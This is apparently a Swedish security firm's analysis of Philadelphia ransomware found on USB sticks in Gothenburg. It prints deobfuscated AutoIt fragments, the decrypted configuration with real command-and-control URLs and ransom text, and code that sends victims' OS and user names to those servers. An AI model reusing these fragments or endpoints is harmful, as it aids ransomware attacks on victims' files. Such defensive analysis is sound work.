Malware i USB-minnen funna i Göteborg

Onsdagen den 22 Mars 2017 rapporterade media om skadliga USB-enheter som hittats i Lindholmen i Göteborg.

Det rapporterades av bland annat [IDG](http://www.idg.se/2.1085/1.678474/ransomware-usb-attack-lindholmen), [Expressen](http://www.expressen.se/gt/skadliga-usb-minnen-planterade-i-goteborg/), [SVT](http://www.svt.se/nyheter/lokalt/vast/it-sakerhetsincident-pa-lindholmen) och till och med högerextrema sajter så som [Nordfront](https://www.nordfront.se/markliga-usb-minnen-har-hittats-goteborg-misstankt-natfiskeangrepp.smr). Rapporterna spreds snabbt i sociala medier och allsköns vilda teorier började dyka upp inklusive industrispionage och ryska hackers som använder "military-grade encryption". Såklart, backades inget av detta upp med någon form av tekniska belägg. Vi på Bitsec motsätter oss starkt det <abbr title="Fear, Uncertainty &amp; Doubt">FUD</abbr> som ofta sprids inom säkerhetsvärlden och ville därför titta närmare på detta.

## USB-enheten

USB-enheten innehöll tre kopior av samma körbara windows-program.

|SHA256 hash|Filnamn|
|:----------------------------------------------------------------:|:-------------:|
| dcd7b8681e9ebcb657cb8f2f3d85c8920f6321c3f90885c31f3a3ab72c4a11cb | aPassTtxt.exe |
| dcd7b8681e9ebcb657cb8f2f3d85c8920f6321c3f90885c31f3a3ab72c4a11cb | PassTtxt.exe|
| dcd7b8681e9ebcb657cb8f2f3d85c8920f6321c3f90885c31f3a3ab72c4a11cb | Grattis.exe|

De första två filerna innehåller några specialtecken i sina namn som inte visas ovan.
Hex-kodningen av filnamnen visas i tabellen nedan:

|Hex-kodat filnamn|Filnamn|
|:----------------------------------:|:--------------|
| 615061737354 e280ae 7478742e657865 | aPassTtxt.exe |
| 5061737354 e280ae 7478742e657865| PassTtxt.exe|


Notera de tre byte i mitten "e280ae" vilka motsvarar [Unicode codepoint U+202E, RIGHT-TO-LEFT OVERRIDE](http://www.fileformat.info/info/unicode/char/202e/index.htm) vilket, i t.ex. Windows Explorer, får det att se ut som filerna heter "aPassT.txt" och "PassT.txt" för att på så sätt lura offret att klicka på dem i tron om att det bara är vanliga text-filer. Alla tre filerna innehåller ett ransomware som går under namnet "Philadelphia Ransomware".

## Philadelphia Ransomware

Philadelphia ransomware är ett ganska simpelt ransomware. Det är ett crimekit som säljs på nätet för ca. $400 och kan konfigureras enligt användarens önskemål.
Konfigurationsparametrar inkluderar saker så som vilka filtyper den ska kryptera, huruvida den ska sprida sig via USB och/eller nätverkseneheter, osv.
Det är en uppföljare på ett tidigare ransomware kallat "Stampado" från samma upphovsperson, "The Rainmaker", efter att det knäcktes och den dekrypterare släpptes av "Fabian Wosar" på "Emsisoft".
Denna version verkar ha cirkulerat sedan någon gång i höstas. Mer om bakgrunden kan läsas i denna artikel: https://www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/

Programmet i sig är skrivet i AutoIt 3, ett system som är byggt för att hjälpa systemadministratörer att automatisera saker på datorn.
Programmen skrivs i BASIC-liknande kod och kan sedan kompileras till en körbar EXE-fil. Koden är kraftigt obfuskerad för att förhindra analys.

Analysen började med att titta på programmet "Grattis.exe" och efter att ha tagit en titt på inbäddade strängar gick misstankarna mot att detta faktiskt var ett AutoIt-skript. För att vara helt säker på att programmet inte bara försökte utge sig för att vara ett simpelt ransomware gjordes även en snabbanalys av själva programmet där inga tecken på fulspel hittades.

{% highlight Bash %}
> strings -n8 Grattis.exe| grep 'AutoIt'
This is a third-party compiled AutoIt script.
{% endhighlight %}

Med hjälp av ett verktyg som heter _Exe2Aut_ gick det att dekompilera AutoIt-skriptet vilket resulterade i fem olika filer hörandes till det skadliga programmet. Namnet på filerna och deras syfte, vilket inte ännu inte känt, visas i tabellen nedan.

Filnamn | roll
--- | ---
Grattis_.au3 | Huvudskriptet
stub.au3.509 | Konstanter för huvudskriptet, encodade
pd4ta.dat | Konfigurationsfil, krypterad
ph1la.bin | Sekundärt skript, krypterat
delphi.au3.509 | Konstanter till det sekundära skriptet, encodade

Filen _Grattis\_.au3_ var obfuskerad med två huvudsakliga tekniker som ofta hittas i skript-baserade malware så som Office-makron och Javascript. Till att börja med hade alla funktioner och variabler blivit omdöpta till nonsens. Dessutom hade alla konstant-värden blivit bortplockade och placerade i en separat fil. För att få tillbaka konstanterna in i skriptet använder den ett litet trick som, vilket senare blev tydling, är till för att undvika deobfuskeringen i verktyget _myAut2Exe_. Metoden sätter upp en initialiseringsfunktion i början av skriptet och laddar sedan alla konstanter från en lista som kallas _$cw_ som inte verkar existera. Listan skapas förstås i initialiseringsfunktionen "A2100001B1E_" som en global variabel så att när exekveringen når rad 6 så laddas konstanterna in i olika globala variabler.

{% highlight BASIC %}
#AutoIt3Wrapper_Compression=4
FileInstall("delphi.au3.509", @TempDir & "\delphi.au3.509")
#NoTrayIcon
Global $cw
#OnAutoItStartRegister "A2100001B1E_"
Global $a5840804b3d = a2100001b1e($cw[1]), $a0340a01754 = a2100001b1e($cw[2]), $a4840c03046 = a2100001b1e($cw[3]), $a3440e02852 = a2100001b1e($cw[4])
{% endhighlight %}

Initialiseringsfunktionen "A2100001B1E_" fungerar så att den hex-avkodar en sträng och skickar in den i "Execute" vilket är eval-motsvarigheten i AutoIt. Detta upprepas flera gånger.

{% highlight BASIC %}
Func a2100001b1e_() For $cw509 = 1 To 5 Local $a2100001b1esz_ = a2100001b1ex_() FileInstall("stub.au3.509", $a2100001b1esz_, 1) Global $a2100001b1e, $cw = Execute(BinaryToString("0x457865637574652842696E617279746F737472696E672827307834353738363536333735373436353238343236393645363137323739373436463733373437323639364536373238323733303738333533333337333433373332333633393336343533363337333533333337333033363433333633393337333433323338333433363336333933363433333633353335333233363335333633313336333433323338333233343334333133333332333333313333333033333330333333303333333033333331333433323333333133343335333733333337343133353436333233393332343333323337333634363333333433333330333333323335333433323337333234333333333133323339323732393239272929")) If IsArray($cw) AND $cw[0] >= 1344 Then ExitLoop Sleep(10) Next
Execute(BinaryToString("0x457865637574652842696E617279746F737472696E6728273078343537383635363337353734363532383432363936453631373237393734364637333734373236393645363732383237333037383333333133323432333433363336333933363433333633353334333433363335333634333336333533373334333633353332333833323334333433313333333233333331333333303333333033333330333333303333333133343332333333313334333533373333333734313335343633323339323732393239272929"))
EndFunc
{% endhighlight %}

Genom att manuellt avkoda dessa strängar flera gånger får vi en funktion som ser ut såhär:

{% highlight BASIC %}
Func a2100001b1e_() Local $a2100001b1esz_ = a2100001b1ex_() FileInstall("stub.au3.509", $a2100001b1esz_, 1) Global $cw = StringSplit(FileRead($A2100001B1Esz_),'o402T',1) 1+FileDelete($A5B00000358sz_)
EndFunc
{% endhighlight %}

Funktionen som anropas på rad 2 hex-avkodar och returnerar filnamnet. Detta leder till att kontant-filen läses in, delas med en fem tecken lång avgränsare och tilldelas till _$cw_-listan. Efter att denna funktion har körts, vilket är det första som händer, är den ursprungliga koden längst upp mycket mer rimlig och skapar massa variabler innehållandes alla konstanter som används i skriptet. Vid detta läge kunde ett Python-skript skapar som gick igenom koden och bytte ut varje förekomst av en sådan variabel med det faktiska värdet den symboliserade. Koden består av många funktioner. De flesta är bara ett litet skikt runt olika Windows-API-anrop. T.ex. ser en funktion ut såhär efter att ha deobfuskerats.

{% highlight BASIC %}
Func crypt_release_context() If NOT IsDeclared("SSA3600504137") Then Global $sscrypt_release_context = 1 EndIf val1_dec() If val1_get() = 0 Then DllCall(val2_get(), "bool", "CryptReleaseContext", "handle", val3_get(), "dword", 0) DllClose(val2_get()) EndIf
EndFunc
{% endhighlight %}

Genom att fortsätta och döpa funktioner och variabler med detta deobfuskeringsskript blev koden tillslut ganska läsbar. Om man hoppar över alla funktionsdeklarationer hamnar man till slut på programmet startpunkt som ser ut såhär.

{% highlight BASIC %}
FileInstall("ph1la.bin", "%temp%\delph1.bin")
FileInstall("pd4ta.dat", "%temp%\pd4ta.bin")
...
crypt_decrypt_file("%temp%\pd4ta.bin", "%temp%\pd4ta.dat", "5So388vmq3lTgJs", const_RC4)
...
crypt_decrypt_file("%temp%\delph1.bin", "%temp%\delph1.dat", ini_read("%temp%\pd4ta.dat", "file", "mutex", ""), const_RC4)
...
$a3ec5904016 = Run(Execute(" @AutoItExe ") & " " & "/AutoIt3ExecuteScript" & " "" & "%temp%\delph1.dat" & """)
ProcessWaitClose($a3ec5904016)
{% endhighlight %}

Konfigurationsfilen dekrypteras med RC4 och en statisk nyckel. Det sekundära skriptet dekrypteras sedan med en nyckel från konfigurationsfilen. Genom att skriva ett kort skript kunde båda dessa filer dekrypteras. Konfigurationsfilen är dessutom ytterligare krypterad då varje sektion, nyckel och värde i INI-filen också är krypterade med samma statiska nyckel. Genom att dekryptera den får man fram följande konfigurationsfil.

{% highlight Ini %}
[file]
mutex = a9ddd610e95b7e872cd194edd0d74988
uac = not

[bridges]
1 = http://elleranfitness.com.au/b1.php
2 = http://smspillar.com/b1.php
3 = http://unmuha.ac.id/b1.php
4 = http://www.mimosdanna.com.br/b1.php
5 = http://ekose.net/b1.php
6 = http://elleranfitness.com.au/css/b/b1.php
7 = http://unmuha.ac.id/css/b/b1.php
8 = http://ekose.net/css/b/b1.php

[message]
115be2b98435259cbbcaa793c9b9dffc = All your files have been encrypted!\r\n\r\nAll your documents (databases, texts, images, videos, musics etc.) were encrypted. The encryption was done using a secret key \r\nthat is now on our servers.\r\n\r\nTo decrypt your files you will need to buy the secret key from us. We are the only on the world who can provide this for you.\r\n\r\nWhat can I do?\r\n\r\nPay the ransom, in bitcoins, in the amount and wallet below. You can use LocalBitcoins.com to buy bitcoins.

[strings]
02061592f063b9b4e08f2adb3f8535c0 = Deadline
50290a893d63a7afe77bef084ffb2a1b = Russian Roulette
fb31ddd9c54fd3dd5a07c813678a3f62 = Last file Deleted:
d8aea318c44105aac275125140e7b085 = Bitcoin Amount
becb5f809420f184d8bc5b17f356a725 = Wallet for Sending Bitcoins
0335a3a7ca4ecc2e1ba974a827efe31a = Copy
1084cf36076b23783289bf73bde2e0b5 = Decrypt your Files
8802e8fce5bb3427e0705653fcffce77 = Paste here the transaction ID to get your files back:
6fa726501ada6cb7cba8280032a303de = Click to Check
aef87c1b6f665ebea931b4dd7322ba07 = Speech (blank for none)

[russian]
enable = 1
amount = 1
interval = 6
unit = h

[deadline]
enable = 1
delfiles = 1
delkey = 1
interval = 4
unit = D

[ping]
interval = 60

[color]
bg = ff0000
fg = 000000

[random]
sethidden = t
melt = t
gentxt = 1

[folders]
<fixed drives> = 1
<removable drives> = 1
<network drives> = 1
<drive root folders> = 1
desktop = 2
my documents = 2
favorites = 1
home path = 2
home drive = 0
downloads = 2
pictures = 2
music = 2
videos = 2
desktop common = 2
documents common = 2

[settings]
extensions = *.7z;*.avi;*.bmp;*.cdr;*.doc;*.docx;*.gif;*.html;*.jpeg;*.jpg;*.mov;*.mp3;*.mp4;*.pdf;*.ppt;*.pptx;*.rar;*.rtf;*.tiff;*.txt;*.wallet;*.wma;*.wmv;*.xls;*.xlsx;*.zip
usbinfect = 1
networkspread = 1
unkillable = 1
process = Isass.exe
extractto = %appdata%
blocktaskmgr = 1
blocksectools = 1
infectexe = 1
processes =
{% endhighlight %}

Här syns adresserna till command & control-servrarna som antagligen är ovetande tredje-partshemsidor som har blivit infekterade av upphovsmakaren. Malwaret stödjer även översättning genom att översätta strängarna i konfigurationen. Den innehåller också parametrar "rysk roulette"-funktionen som raderar slumpvis valda filer. Det finns även delar som styr vilka filer den ska kryptera, var den ska leta och hur den ska försöka sprida sig.

Med nyckeln i konfigurationsfilen går det att dekryptera "delph1.bin"-filen vilken innehåller ytterligare ett AutoIt-skript. Det skriptet kan sedan dekompileras med verktyget _myAut2Exe_ för att få fram själva koden. Under dekompileringssteget hittas tre intressanta meddelanden i loggfilen från dekompilatorn. Dessa rader indikerar att angriparen lagrade koden på en dator med ett användarkonto som heter "JohannaData".

```
000000E8 -> CompiledPathName: C:\Users\JohannaData\AppData\Local\AutoIt v3\Aut2Exe\aut45E6.tmp
000001BF -> CompiledPathName: C:\Users\JohannaData\AppData\Local\AutoIt v3\Aut2Exe\aut4578.tmp.tok
00017E82 -> CompiledPathName: C:\Users\JOHANN~1\AppData\Local\Temp\jfthvbj\delphi.au3.509
```

Det inre skriptet är obfuskerat på samma sätt som huvudskriptet och deobfuskeras på liknande sätt. I denna del hittar vi GUI-koden och koden som ansvarar för kommunikation med C&C-servrarna.

{% highlight BASIC %}
http_request(ini_read($indata, "bridge", "url", "") & "?p=Deletevictim&id=" & ini_read($indata, "bridge", "id", ""))
...
http_request($url, $post_data = FALSE)
...
http_request(STRING($url & "?p=Insert&osinfo=" & urlencode(EXECUTE(" @OSVersion ")) & "&user=" & urlencode(EXECUTE(" @UserName ")) & "&country=" & urlencode($A199CD04420) &
...
http_request(STRING($url & "?p=Insertp2p&id=" & ini_read($indata, "bridge", "id", $A262B500160) & "&osinfo=" & urlencode(EXECUTE(" @OSVersion ")) & "&user=" & urlencode(EXECUTE(" @UserName ")) &
...
http_request(ini_read($indata, "bridge", "url", "") & "?p=Checkpayment&id=" & $A262B500160 & "&transaction=" & A057070275C($A05DD200E29) & "&v=130")
...
http_request($A3F3ED05C0A & "?p=Ping&id=" & $A262B500160 & "&s=" & A057070275C(ini_read($indata, "temp", "status", "")))
...
http_request($url & "?p=Enablep2p&id=" & $A262B500160) = "ok" THEN
{% endhighlight %}

Genom att testa dessa kommandon på C&C-servrarna får vi ett svar med ett infektions-ID, Bitcoin-adressen som man ska betala till och hur mycket som ska betalas.

{% highlight Bash %}
curl -v 'http://elleranfitness.com.au/b1.php?p=Insert&osinfo=1'
*Trying 27.121.64.192...
* Connected to elleranfitness.com.au (27.121.64.192) port 80 (#0)
> GET /b1.php?p=Insert&osinfo=1 HTTP/1.1
> Host: elleranfitness.com.au
> User-Agent: curl/7.47.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Fri, 17 Mar 2017 00:51:29 GMT
< Server: Apache/2.2.31 (Unix) mod_ssl/2.2.31 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
< X-Powered-By: PHP/5.3.29
< Transfer-Encoding: chunked
< Content-Type: text/plain; charset=UTF-8
<
* Connection #0 to host elleranfitness.com.au left intact
58cb3311b3196|1Efhgmj2YLmFjteTf8eEYpAgdRMqPwKS6Z|0.5
{% endhighlight %}

Genom att testa samtliga C&C-servrar kan vi konstatera ett endast följande tre fortfarande fungerar.

```
http://elleranfitness.com.au/b1.php
http://smspillar.com/b1.php
http://elleranfitness.com.au/css/b/b1.php
```

Det finns också en backup-adress som används för Bitcoin-betalningar om inget annat anges. Den tillhör antagligen författaren av programmet. I skrivande stund har inga pengar betalats till någon av adresserna.

Kommentar | Plånbok | Saldo
--- | --- | ---
Från C&C | https://blockchain.info/address/1Efhgmj2YLmFjteTf8eEYpAgdRMqPwKS6Z | 0.0
Hårdkodad | https://blockchain.info/address/14j4dhaUsArF3Z3snkC1PjLEjcUcioh2KJ | 0.0

Det går också att hitta nyckelgenereringsalgoritmen som använder den inbygda slump-funktionen i AutoIt för att generera en 32-40 tecken lång nyckel. AutoIt använder Mersenne Twister internt för sin slumpgenerering. Olyckligt nog för författaren seedas algoritmen med den nuvarande tiden vilket gör det näst intill trivialt att återskapa nyckeln. På så sätt kan alltså filer som har blivit krypterade med detta malware dekrypteras utan att betala något alls för nyckeln. Vidare, vilket kan ses i koden ovan, skickas nyckeln som en GET-paramter över okrypterad HTTP till C&C-servrarna viket betyder att om det finns någon loggande proxy eller liknande på vägen så fastnar sparas nyckeln där och kan återfås.

{% highlight BASIC %}
FUNC generate_key() IF NOT ISDECLARED("SSgenerate_key") THEN GLOBAL $SSgenerate_key = 1 ENDIF LOCAL $key FOR $i = 1 TO RANDOM(32, 40, 1) $key &= CHR(RANDOM(65, 122, 1)) NEXT RETURN $key
ENDFUNC
{% endhighlight %}

Även i denna version av programmet finns det ett meddelande till Fabian Wosar på Emisoft i koden. Hashen av detta meddelande är det som används som krypteringsnyckel till det intre skriptet om inget annat har angetts.

{% highlight BASIC %}
FUNC A4250A0504F($logdata) IF NOT ISDECLARED("SSA4250A0504F") THEN GLOBAL $SSA4250A0504F = 1 ENDIF RETURN STRINGTRIMLEFT(crypt_hash("give up fabian" & $logdata, const_MD5), 2)
ENDFUNC
{% endhighlight %}

En annan intressant sak med koden är att den fortfarande har all debug-funktionalitet kvar. Runt om i koden finns det anrop till en funktion som döptes till debug_print. Denna funktion kontrollerar om något av argumenten till programmet är "debug" och skriver i så fall loggdata till en fil som heter "philadelphia\_debug.txt" på skrivbordet.

{% highlight BASIC %}
Func print_debug($logdata) ... Local $a086560314f = False For $a14b1700b3e = 1 To $cmdline[0] If $cmdline[$a14b1700b3e] = "debug" Then $a086560314f = True EndIf Next If $a086560314f Then FileWriteLine("%desktop%\philadelphia_debug.txt", "[" & Execute(" @YEAR ") & "/" & Execute(" @MON ") & "/" & Execute(" @MDAY ") & " " & Execute(" @HOUR ") & ":" & Execute(" @MIN ") & ":" & Execute(" @SEC ") & "] [THREAD " & $cmdline[2] & "] " & $logdata) EndIf
EndFunc
{% endhighlight %}

Malwaret har också förmågan att vitlista maskiner från specifika länger. I just detta fall används inte den funktionen då den inte är konfigurerad utan attackerar allt den kommer över. Koden ligger dock fortfarande kvar och skulle, om den använts, baserat sitt beslut på "LocaleName"-nyckeln i registret.

{% highlight BASIC %}
$A55C900092B = REGREAD("HKEY_CURRENT_USER\Control Panel\International", "LocaleName")
$A33C9302736 = ini_read_list($A00A9805030, "ignore_country")
IF NOT @ERROR THEN debug_print("Some countries are being ignored. This machine is from " & $A55C900092B) FOR $i = 1 TO $A33C9302736[0][0] IF $A33C9302736[$i][0] = $A55C900092B THEN debug_print("This machine will be ignored.Closing...") EXIT ENDIF NEXT debug_print("This machine is not on the ignore list")
ENDIF
{% endhighlight %}

Överlag finns det inget anmärkningsvärt med detta malware. I princip gör den följande, väldigt ransomware-typiska, saker:

1. Läser konfigurationen
2. Genererar en nyckel
3. Skickar nyckeln till C&C-servrar
4. Hittar filer att kryptera enligt konfigurationen
5. Krypterar filerna med AES256 genom Windows Crypto-API.
6. Genererar ett meddelande till offret.
7. Installerar sig själv att köras automatiskt

Efter genomförd betalning gör den följande:

8. Kontaktar C&C-servrar för att få nyckeln
9. Dekrypterar alla filer
10. Tar bort sig själv

Sammanfattning och slutsatser:

USB-enheterna innehöll ett ransomware kallat "Philadelphia ransomware". I motsats till vad som hävdats i media fanns inga autostart-funktioner på USB-minnet. Ransomwaret kommer i form av tre olika körbara filer med konstiga namn för att lura offret att de bara är vanliga textfiler. I motsats till vad som hävdats i media finns det inga tecken på att detta skulle vara något mer avancerat än ett simpelt ransomware. Ransomwaret är en ny version av "Stampado"-ranswaret skrivet i AutoIt 3. Obfuskeringsteknikerna är standardmässiga för skript-baserat malware. I motsats till vad som hävdats i media finns det inget avancerat med detta malware och fraser så som "military-grade encryption" finns enligt vår analys inga belägg för. Den uppmärksamma läsaren ser ett mönster här. Alla ogrundade påståenden och spekulationer om denna attack är felaktiga och bidrar bara till spridande av rädsla, osäkerhet och tvivel, <abbr title="Fear, Uncertainty &amp; Doubt">FUD</abbr>.

För den som vill titta närmare på koden finns all kod och alla skript paketerade i [denna zip-fil](<LÄNK TILL ZIP>). Notera att det visserligen är ett simpelt malware men det är fortfarande ett malware och Bitsec tar inget ansvar för skador som uppkommer till följd av innehållet i denna fil. Zip-filen är skyddad med lösenordet "malware".

Om Bitsec:

Bitsec hjälper offentliga verksamheter, myndigheter, börsnoterade företag och privata företag som har krav på säker hantering av information och data samt behov att skydda sig mot olika typer av angrepp och störningar. Med mångårig erfarenhet från mycket kvalificerade uppdrag är Bitsec en kompetent partner i samtliga processer rörande säkerhet; från design, test av ingående komponenter, implementation, löpande säkerhetsgranskningar till att slutligen vara ett kompetent stöd om något går fel. Bolaget är ledande inom IT-forensik och incidenthantering och har kunder över hela världen inom detta område. Bitsec hjälper också våra kunder att organisera sitt informationssäkerhetsarbete.

Våra kunder finns exempelvis inom finanssektorn, hälsosektorn, offentlig förvaltning, leverantörer till försvarsmakten, polis och åklagarmyndigheten, fordonsindustrin, IoT-sektorn, media och underhållning samt verkstadsindustrin med verksamhet inte bara inom Sverige utan även inom övriga Europa och Nordamerika.

Bitsecs styrka ligger i våra konsulter, som med engagemang och erfarenhet hanterar säkerhetsgranskningar och incidenter i en stor mängd kvalificerade uppdrag. För att Bitsec skall kunna möta de stränga krav på säkerhet som många av våra kunder ställer, är samtliga konsulter, förutom för sin kompetens, också rekryterade för sitt goda omdöme, sin integritet samt för en personlighet som väl passar in i Bitsecs värdegrund. Varje konsult genomgår årligen en säkerhetsprövning och bedöms redan vid rekryteringstillfället ur ett säkerhetsperspektiv för ett godkännande vid en eventuell registerkontroll.